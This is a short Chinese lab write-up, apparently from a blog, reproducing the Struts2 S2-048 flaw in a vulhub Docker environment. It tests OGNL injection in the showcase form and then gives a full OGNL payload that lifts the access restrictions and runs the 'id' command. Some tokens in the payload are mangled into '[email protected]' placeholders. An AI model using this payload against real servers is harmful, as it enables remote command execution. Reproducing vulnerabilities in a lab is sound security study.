Struts2反序列化漏洞复现

环境: vulhub

环境搭建

进入s2-048目录

 切换root用户

 启动漏洞环境 docker-compose up -d

漏洞复现

 浏览器访问 showcase

Struts2反序列化漏洞复现_第1张图片

 Struts2反序列化漏洞复现_第2张图片

Gangster Name输入 ${233*233} , 其余随便填

Struts2反序列化漏洞复现_第3张图片

 Struts2反序列化漏洞复现_第4张图片

将Gangster Name输入一下payload , 其余随便填

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)}

Struts2反序列化漏洞复现_第5张图片

 Struts2反序列化漏洞复现_第6张图片

你可能感兴趣的:(漏洞复现,安全漏洞)